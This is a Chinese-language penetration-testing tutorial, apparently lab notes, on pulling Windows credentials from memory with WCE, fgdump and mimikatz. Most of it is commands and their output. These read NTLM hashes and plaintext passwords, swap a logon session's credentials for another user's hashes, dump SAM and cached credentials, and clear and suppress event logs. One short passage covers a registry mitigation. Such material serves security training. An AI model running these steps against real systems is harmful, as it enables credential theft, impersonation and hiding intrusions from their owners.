前言
windows身份认证过程如图所示
上一届提到的pwdump是从SAM database里读取
如果能从内存里读取
面临的防卫会低很多
1、WCE(windows credential editor)
- windows 内核中保存有密码明文副本,安全机制较低
- 需要管理员权限
- 工具默认在 kali 的 /usr/share/wce/wce-universal #通用格式是自动识别32位和64位
- 多用户登录目标主机
过程如下:
将wce拷贝到windows
cmd中:
C:\>wce-universal.exe -lv #查看登录用户
0020B19D:user1:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
# 与 C:\>PwDump.exe localhost 结果相同
C:\>wce-universal.exe -d 0020B19D #指定从内存里删除user1账号
C:\>wce-universal.exe -lv #发现删除成功
001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
C:\>wce-universal.exe -g passwd #计算密码对应的 HASH 值
Password: passwd
Hashes: 91C7AE7122196B5EAAD3B435B51404EE:22315D6ED1A7D5F8A7C98C40E9FA2DEC
C:\>wce-universal.exe -w #读取内核中的明文密码
user1\ICST-WINATT:123456
user2\ICST-WINATT:123456
test\ICST-WINATT:123456
kevin\ICST-WINATT:123456
NETWORK SERVICE\MSHOME:
C:\>net user user1 111222 #修改内核中的密码
C:\>wce-universal.exe -w
user1\ICST-WINATT:123456
user2\ICST-WINATT:123456
test\ICST-WINATT:123456
kevin\ICST-WINATT:123456
NETWORK SERVICE\MSHOME:
# 发现内存里没有变化,当前内核中保存的值会在下次登录被读取出来
C:\>wce-universal.exe -lv
001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
C:\>wce-universal.exe -i 001E5D92 -s kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 #对 LUID 进行修改(将LUID改为匹配其他用户的用户名和密码)
Changing NTLM credentials of logon session 001E5D92h to:
Username: kevin
domain: ICST-WINATT
LMHash: 44EFCE164AB921CAAAD3B435B51404EE
NTHash: 32ED87BDB5FDC5E9CBA88547376818D4
NTLM credentials successfully changed!
C:\>wce-universal.exe -lv #再次查看发现已经被修改
001E5D92:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
防范手段:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
删除里面的
wdigest和tspka
不留空行
2、fgdump
在 kali 系统中可以找到 /usr/share/windows-binaries/fgdump/
放在 WinXP 中, 双击或在命令行执行 fgdump.exe 会自动生成三个文件,文件中保存着密码
3、mimikatz
在 kali 中的路径 /usr/share/mimikatz
大神级工具
放到win中
他的一些功能如下:
C:\Win32>mimikatz.exe
#查看帮助是::
mimikatz # ::
standard - Standard module [Basic commands (does not require module name)]
crypto - Crypto Module
sekurlsa - SekurLSA module [Some commands to enumerate credentials...]
kerberos - Kerberos package module []
privilege - Privilege module
process - Process module
service - Service module
lsadump - LsaDump module
ts - Terminal Server module
event - Event module
misc - Miscellaneous module
token - Token manipulation module
vault - Windows Vault/Credential module
minesweeper - MineSweeper module
net -
dpapi - DPAPI Module (by API or RAW access) [Data Protection application programming interface]
busylight - BusyLight Module
sysenv - System Environment Value module
sid - Security Identifiers module
iis - IIS XML Config module
rpc - RPC control of mimikatz
mimikatz # privilege::
Module : privilege
Full name : Privilege module
debug - Ask debug privilege * *
driver - Ask load driver privilege
security - Ask security privilege
tcb - Ask tcb privilege
backup - Ask backup privilege
restore - Ask restore privilege
sysenv - Ask system environment privilege
id - Ask a privilege by its id
name - Ask a privilege by its name
mimikatz # privilege::debug #提权
mimikatz # sekurlsa::
mimikatz # sekurlsa::logonPasswords #会看到很多用户信息
mimikatz # sekurlsa::wdigest
mimikatz # process::list #查看进程
mimikatz # lsadump::sam #获取sam中的用户数据
mimikatz # lsadump::cache
mimikatz # ts::multirdp #xp默认只允许登录一个用户,这个指令可以并行开用户
mimikatz # event::clear #清除日志
mimikatz # event::drop #不再产生新日志
mimikatz # misc::regedit #注册表编辑器
mimikatz # token::whoami #token里有whoami功能
结语
这些个工具都蛮好用的
mimikatz功能很全